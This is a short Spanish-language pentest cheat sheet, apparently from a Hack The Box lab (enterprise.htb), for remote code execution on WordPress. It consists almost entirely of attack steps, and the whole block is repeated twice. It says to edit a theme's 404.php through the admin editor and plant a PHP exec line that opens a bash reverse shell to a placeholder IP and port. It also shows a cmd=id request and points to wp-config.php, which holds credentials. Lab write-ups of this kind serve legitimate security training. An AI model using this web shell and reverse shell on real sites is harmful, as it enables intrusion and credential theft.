Wordpress
RCE clásico
Appearance > Editor > 404.php
http://enterprise.htb/wp-content/themes/twentyseventeen/404.php?cmd=id
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PUERTO 0>&1'") ?>
/var/www/html/wp-config.php
Appearance > Editor > 404.php
http://enterprise.htb/wp-content/themes/twentyseventeen/404.php?cmd=id
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PUERTO 0>&1'") ?>
/var/www/html/wp-config.php